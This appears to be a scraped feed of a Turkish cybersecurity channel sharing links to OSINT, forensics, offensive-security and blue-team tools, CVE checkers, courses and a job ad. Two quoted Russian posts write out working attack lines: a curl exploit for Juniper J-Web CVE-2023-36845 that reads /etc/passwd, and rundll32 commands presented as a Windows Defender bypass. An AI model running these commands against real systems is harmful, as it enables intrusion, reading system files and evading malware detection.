İbrahim BALOĞLU - Siber Güvenlik Paylaşımları

#tools #OSINT 1. Tosint - Telegram OSINT Tool https://github.com/drego85/tosint 2. Telegram scenario-based API aimed at OSINT https://github.com/Postuf/telegram-osint-lib 3. Discord OSINT https://github.com/husseinmuhaisen/DiscordOSINT

Siber Olaylara Müdahale Eğitimi (Windows Forensics) https://www.udemy.com/course/siber-olaylara-mudahale-egitimi-windows-forensics/?couponCode=F3FEB5CC284489225B5A

Top 10 web hacking techniques of 2023 https://portswigger.net/research/top-10-web-hacking-techniques-of-2023

ADEO Cyber Security Analyst (DFIR) https://www.linkedin.com/jobs/view/3835236694

#Offensive_security 1. Payload Builder + Shellcode Loader https://github.com/Maldev-Academy/CodeSearchDemo

Siber Olay Müdahale alanında uzmanlaşmak isteyenler için “Sıfırdan Uzmanlığa Windows Adli Bilişim” Eğitimi https://www.ibrahimbaloglu.com/2020/09/sfrdan-uzmanlga-windows-adli-bilisim.html

#tools #Offensive_security 1. Tool to remotely dump secrets from the Windows registry https://github.com/jfjallid/go-secdump 2. Script to check for the CVE-2023-36845 vulnerability https://github.com/ak1t4/CVE-2023-36845

1. Web Hacking + Bug Bounty Tricks https://github.com/Mehdi0x90/Web_Hacking 2. Active Directory Enumeration for Red Teams https://www.mdsec.co.uk/2024/02/active-directory-enumeration-for-red-teams

#tools #Cloud_Security 1. ROADtools - collection of Azure AD tools for offensive/defensive security purposes https://github.com/dirkjanm/ROADtools 2. Webhood - AWS/Azure/Google Cloud URL scanner https://github.com/webhood-io/webhood

CVE-2023-36845 и CVE-2023-36846 Juniper Junos OS J-Web RCE * На все это дело есть и сплоит на питоне но можно и в curlык *

curl -kv "https ://OLOLO.com/about.php? PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

Windows Defender Detection Mitigation Bypass Vulnerability Win LPE В 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. * то есть было и пофиксили: C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666) магия запятой: C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666) собака старая, трюки новые. CVE пока не имеет ) #defender #bypass

#tools #Offensive_security 1. jsluice++ - Burp Suite extension for passive/active scanning of JavaScript traffic using jsluice https://github.com/0x999-x/jsluicepp 2. Persistence via Windows Setup Script https://pentestlab.blog/2024/02/05/persistence-windows-setup-script

#exploit 1. Docker Remote API Scanner and Exploit https://github.com/justakazh/DockerExploit 2. PoC of BITB w/out the use of iframes https://github.com/waelmas/frameless-bitb 3. CVE-2023-44313: Apache ServiceComb <2.1 - SSRF https://xz.aliyun.com/t/13548

#Blue_Team_Techniques 1. A repository of code signing certificates known to have been leaked/stolen, then abused by threat actors https://github.com/WithSecureLabs/lolcerts 2. Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure https://github.com/0dteam/CVE-2024-22024

How to investigate a Malicious Alert for Threat Hunting in Elastic Security https://discuss.elastic.co/t/347618